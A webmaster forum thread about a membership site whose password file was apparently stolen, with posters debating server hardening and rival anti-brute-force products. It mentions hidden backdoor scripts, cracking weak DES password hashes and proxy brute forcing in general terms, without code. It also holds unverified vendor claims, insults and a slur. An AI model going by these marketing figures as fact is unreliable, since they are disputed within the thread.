anyone telling you to change your password protection script has no clue what they are talking about. Warchild and some others were giving you the correct answers.

I have a clue. And I think that securing your server is of course step ONE. That should be a given. Then if you want to really stop all password trading and brute force attacks after your server is nailed down...then yes, you would want to change over to the phantom frog software. As far as I know it is the only security software of it's type. Warchild is giving some very solid advise. But shutting the doors on your server isn't gonna help stop people trading passwords, or stop the hundreds that are already out there, or keep you from the hours of headaches and work that goes with dealing with all that customer support. There is a lot more to what this guy is facing than just server security. Though obviously that should be job number one.

Using NATS?

That's true. If he's using NATS his passwords are definitely compromised. Another good reason to have a system that blocks them and changes the passwords. And another good reason to listen to Warchild and aico and get the security of the site (including the IP restriction of NATS) up to snuff.
It sucks that there are so many thieves out there and honest hard working people have to watch their backs every second.

Hey D....I like your sites. I'm gonna sign up and promote them. I can definitely use some hot black girl stuff on my tgp's. Love those big asses. :thumbsup

Cool, man. :) Sign up tonight, and I should push your account through tomorrow. Beyond that, it's pretty straightforward. Let me know if there's anything you need.

Just finished signing up. That's some funny shit on the Shorty Mac site. A rap for every scene description....pure genius! I love it. :thumbsup

I say again, Phantom Frog and Strongbox DO NOT protect your .htpasswd file. All of your 400 passwords are on that site because someone got access to your .htpasswd file, while PF and SB will protect your members area from people using those passwords, they will not, and DID NOT, protect your .htpasswd file, someone hacked your server and is still probably doing so.

Agree that the server must have been exploited by a script. I have contacted tech support and asked them to run a diagnostic on it. Changing all my passwords as well as an added precaution. And also dumping wordpress. The less scripts the better.

I addressed the fact that his server was hacked.

PF is for after this happens... IT DOES HELP!

So if I discover it has been hacked ( likely) what is there I can do to make sure it doesn't happen again?

Hire a security guy to show you what to do. And to comb the server for backdoors. Password hackers love to leave ways to get back in.

Yes thats some good advice.

Any programmer with a brain can do what phantomfrog does.

Just curious, the passwords are encrypted. Is there a way to 'decrypt' them?

Yes, there is.

To the topic poster, if you still need any help hit me up.

I have just had the server thoroughly checked and there's no infections at all. I have changed all passwords and am going to remove wordpress as well.

I was hoping to find something so I can solve the problem. Wordpress is being removed this week just incase that's the cause.

Then install Phantom Frog and see what happens. Hopefully it was a case of Wordpress or a hacked password for root, in which case it will be solved.

Hope this thing doesn't happen to you again mate

And for the Wordpress, just get yourself another server....even a piece of crap virtual server, like VRocks said. That way when someone hacks into it they don't have anything important to mess with and you can still run the blog.

to help prevent it from happening again try to keep all software(especially scripts) that are on your server as up to date as possible.

i would also recommend having more then one person check your server, as differant parties have differant ways of checking. I know hackers that can hide stuff on your server in amazing places.

loco12, I think we got an email from you and Ali is responding right now.
In summary, any script anywhere on the server could be exploited by a
hacker to retrieve your password list. PHP scripts tend to be particularly
vulnerable. In brief, what you'll need to do is a standard security check
getting rid of any old, unused scripts or scripts that shouldn't be there at
all, then check for security updates on any scripts that you contniue to use.
The idea is to get rid of any means the cracker may have of getting the
password file. This is seperate from any protection you might use such as
Strongbox, Password Sentry, Frog, etc. These systems will alert you to the
problem, but they can't patch up other scripts elsewhere on the server that
may allow an attacker to get the file.

Secondly, we'll look at the encrpytion on the password file so that even if a
cracker DOES get it, it does them no good. justsexxx brought this topic up:

Yes, it's incredibly easy to decrypt the old DES encryption that most people use.
It takes only a few seconds to start getting working passwords. That's why we
strongly recommend modern strong encryption and provide you the tools to do
that. This is of course where the people suggesting Phantom Frog have it totally
backwards - in it's recommended configuration using strong encryption, a
Strongbox password file is several million times harder to crack than a
standard Phantom Frog installation. What would take a cracker 14 seconds
with Phantom Frog's normal install would take 181 years with ours.



Wilson, you like to spout your mouth off based on some personal feelings you
have against someone involved with Strongbox, but despite our offer of a
$10,000 reward if you could ever brute force a Strongbox site you don't
come up with the goods. Why is it that you talk so much trash but can't back
it up even when we offer you $10,000 to do so? Perhaps because you have
no idea what you're talking about and just like to make yourself look stupid?

raymor - I've loved Strongbox and your customer service for quite a few years now. Your program beat the hell outta pennywize. I've only been happy with it from day one.

The automatic reissue of a password being emailed to the member, and that geo-ip thing sounds interesting. Any chance of having either of those features added to strongbox in the near future?

How a hacker hides the backdoor.

He writes a SIMPLE PHP script.

Then places said script inside a directory like:

/yourwebsite/galleries/12/4050/script.php

So that it is somewhere you won't find it without basic command line knowledge.

loco: I have a friend who is amazing at unix security, has been programming since he was 6.. often wrote basic code on paper at school.. ;)

He wouldn't be very expensive, and I'd trust him with my home. If you're interested, get in touch and he will make sure your server is "unfucwiddable" as he would say. :)

becuase everyone on GFY is ALL talk and no action

most couldn't put up a basic html page without help of dreamweaver or frontpage, much less figure out how to brute force into a server

Actually, someone already posted it.. do a search.

See now this is something I dont get.
Even if the PhantomFrog was just plain text only the first person to try would get in, all following attempts would be blocked.
And you say "normal install" a lot. Please back up your statement.




Show me the server you have set up for someone to brute force and give me a couple days.
Although I know several people that have had some hard core attempts, and I know why its un brutable, its because it crashes the server.
I also dont know why your "image verification" is just a rotation of 40 or whatever images, not even a true random image for verification, why is this?

His server is "unbrutable" because the only combo that gets you in is something like "ksl#59basBZkvlmadA:Abj4090bBZ-biadfmkdf" most likelly, and that defies the purpose of the bruteforce, since if you ONLY had such logins in your user base, you wouldn't need strongbox (or any fancy brute protection systems like pennywize, frog ...). You could protect that with basic auth (where the speed of tries/sec goes considerably higher then when sending complete data through post) and it would never get bruted. So his challenge is stupid to begin with.

But we all know that users don't have such user/pass combos.

Heh, i'll take that $10.000 :1orglaugh I am not bashing or anything, i really love the script you guys have created, it's one of the better bruteforce protection scripts out there. HOWEVER i know for a fact that Strongbox is actually bruteforcable. We weren't sure which script to use for our sites and we were strongly leaning towards Strongbox, however we decided not to do so after some deep research.

What makes you 100% sure that your script is not bruteforcable ?

Idk, But That Is A Good Question Tho ???

That was true in 1998. That's why we wrote Strongbox - to have something a
bit smarter than just counting IPs. Strange, it took 9 years for anyone else to
catch on that they needed to do something other than just count IPs. Then
suddenly though Frog had existed years, in 2007 suddenly people heard about
it and now we have TWO systems that aren't completely stupid - Strongbox and
Frog.

Yes, it is. We just don't promote that because we think it's a BAD idea for
most webmasters. For huge sites with thousands of members the
customer service workload might be so that that it makes sense, but for most
it doesn't make sense automatically to give someone a new password after
they've already given theirs out. With our recommended configuration, you can
almost guarantee that any compromised passwords were given out by the
member, so the webmaster may want to use some judgement in giving out
new ones.

When we set up such a system for a webmaster who insisted on trying it,
we found that indeed people would keep giving out their passwords everytime
one got caught if you do a "dumb" system like Frog has. So before promoting
such a thing we're waiting until we're done developing an intelligent
system that isn't open to this kind of abuse.

Password mailed to member exists, but is currently lacking in intelligence,
it just emails new passwords like Phantom Frog does. We think that's a BAD
idea for most webmasters. We're currently developing a more intelligent
system as part of Strongbox 4.0, to be released soon.

Regarding geo-ip, as you may know, Strongbox was the first such system to
use any kind of geo-ip. Country based geo-ip seems to work quite well,
possibly better than Frog's assumption that the database can be trusted to be
more specific than that although the company who makes the database says
it's wrong as much as 40% of the time, depending on the region. However,
Frog's "feature" is great marketing since most webmasters don't realize it's
based on an admittedly inaccurate database, so in Strongbox 4.0 we're blending
both approaches. Whereas Frog RELIES on the database being more acurrate
than it's creators claim, Strongbox 4.0 will CONSIDER the more specific geo-ip
information ALONG WITH other factors including basic bio-metric indicators
which look at the person on the other side of the monitor.

Nothing could be further from the truth. Geez, why does everyone who has
absolutely no clue what they are talking about feel the need to post as though
they do? Actually we set up the test server EXACTLY the same way as we
do any other site. The user names and passwords arer short, memorable
passswords generated from our publicly available tool that you can use even
without Strongbox. It's used many times per day by many webmasters.
Have you even bothered to browse our web site before making up total BS to post?

Seriously, people, before you post any more total crap about Strongbox
take five or ten minutes to at least look at the site even if you aren't going to
do do something strange like say look at the actual product before posting
about it.

Actually, come to think of it, taking five minutes to get their facts straight
is too much to ask of people who argue on the internet. I know that.
let me suggest something simpler that takes only three seconds - when you
DO post, just be honest by including the sentence "I've never seen Strongbox
and so have no idea what I'm talking about".

Arguing on the internet is like competing in the Special Olympics -
even if you "win" you're still a retard.

Indeed all of the user names would quickly be blocked and noone could
get in, which is pretty much the subject of this thread. The idea with our
approach is to make sure that they don't get blocked because they don't get out.
You are correct, with a typical Phantom Frog install all the user names would
be blocked. We think it's better if the paying customers are able to log in to
your site.

I'm not sure what you mean by "backing up" a reference to a "normall install"
of PF, Pennywize, Proxypass, etc. as opposed to some special installation they
may have done once that's different from the way they normally do things.
As a computer science person, I'm very precise in my language.
We install and develop Strongbox all day everyday, we don't spend all that
time looking at the "competition", so I don't know the details of every installation
they've ever done. Therefore I can't say that "Proxypass always ..." or
"Frog always ... ". I can only compare our approach to what others NORMALLY
do. For example Phantom Frog is NORMALLY extremely strict. They normally
focus more than we do on trying to catch every compromised password the
first time, at the expense of accidently blocking a lot more legitimate members.
We normally use settings that are more geared to making sure that paying
members can get in OK, knowing that the variety of factors we consider will
catch almost all compromised passwords pretty quickly. Strongbox COULD
be set up to be super strict, like Phantom Frog is, and perhaps Frog COULD
be set up to be more lenient, but it's useful to talk about how they are
NORMALLY installed. Thus I say that Phatom Frog will NORMALLY block more
legitimate members in an attempt to block compromised passwords more
quickly than Strongbox NORMALLY does.


I'll be glad to set up a test server for you and send you that information.
Just shoot me an email and I'll send you some specifics.
You DO intend to try something special that might actually work, right?
This isn't 1996 and a dumb brute force would just be a huge waste of time.
When we posted the $10,000 on the cracker forums we had a couple of
guys claiming they had some exploit they wanted to test out and it later
turned out all they had was a list of 10,000 proxies. PULEAZE! Spreading
requests like that isn't going to get you anywhere close. Most of those will
probably already be in our database which includes hundreds of thousands
of open proxies and any that aren't in the database will be detected by our live
detection. So anyway, yeah, just email me and I'll set it up for you.


There are a lot more than 40 words in our dictionary.
We use words rather than random characters because random
characters are really fucking annoying for the customer.

Thanks for the reply. I'm so looking forward to Strongbox 4! I've got some new sites going online soon, and will want my old ones updated to the latest version too! I've loved strongbox since the day it was installed. No monthly fees, and works as promised. Haven't had a huge unexpected server bill since.

Well as far as actually brute force that's simple math. You'd need millions
of proxies and hundreds of servers manageing those millions of proxies.
Just do the math. Common sense tells us that no hacker has millions of
proxies at his disposal. Even if a single cracker controlled ALL Windows
Vista or Windows XP machines on the planet it wouldn't be enough.

Now some other attack besides brute force is another question, and one that
can't be simply answered with ten minutes of simple arithmetic. We wanted to
be sure that Strongbox couldn't be penetrated any other way, and that is
of course the reason we posted the $10,000 offer on all the big hacker boards
way back when. Some really bright hackers made some valiant efforts and
none succeeded, so I'm now pretty confident about Strongbox. That's not to
say it couldn't ever happen, but all of the big name hackers pretty much give
the same answer when asked how to get past Strongbox - they tried it, they
failed, so go find a Pennywize site with similar content. Of course at the time
I went all over the hacker boards with the offer I could actually AFFORD to pay
$10,000 to a smart bright hacker who pointed out a weakness. :) It would be a
pretty big hit to take today. I'll still stick by it with these smartasses on GFY,
but I'm no longer going around taunting the top hackers with the offer. ;)

One hacker who asked that I not reveal his name DID find HALF of a possible
attack vector - not anything he could actually use, but something that would
get you half way there to getting past one of our security measures, then he
postulated that if he were able to complete that attack and also find some way
around another of our security measures, it would then become a brute force
type of situation. We of course patched that up real quick and that's been
taklen care of for quite some time now.

Lol. It's stupid arguing with you so i'll stop right here. I've seen you argue with other people, you just reiterate same shit. You have too high estimate of yourself while infact you can't even keep your server safe, so keep talking the talk. Your software is weak, whether you admit it or not.
And your "big hacker boards" = you googled for "xxx password" and similar bullshit and advertised there. You've never seen a hacker board in your life. It's the same bullshit you're selling to your customers on the "active spider" plan. All those password boards are run by webmasters anyway. And your "proxy database" rofl, same thing. Keep marketing tho

I have noticed that after the user has requested a new password be automatically emailed to them that there isnt any unauthorized people using that pass for several days. There are people attempting with the old pass, but not getting in.
Then a few days later maybe someone else will attempt to get in... but here is the best part, they still cant get in.

SB will let 4-5 completely different people in every single day as long as the member name is active.
How is that better?

The user has to request the pass be automatically emailed to them, it doesnt just get mailed out the moment its been blocked.

Also about the accuracy of the Geoip DB, this is a quote striaght from the geoip database site.
"Over 99% accurate on a country level, 85% accurate on a state level, 80% accurate for the US within a 25 mile radius."

Thats slightly better then the 40% you claim.
Frog also does not only reply on geoip.

If a legit member is blocked they can very easily get a new password instantly to their email, resulting in the member staying happy.
SB cant block more because then you would have more people pissed they cant log in for hours and hours while they wait for the webmaster to reisue a new one for them. That is if they ask in the first place and dont just cancel their membership.
Automation is a good thing.

40.... 100 same difference. Its still a HUGE pain in the ass, and really fucking annoying for the customer.



I always find it odd in threads where it comes down to SB and PF you feel you need to bash PF more then just back up your own program.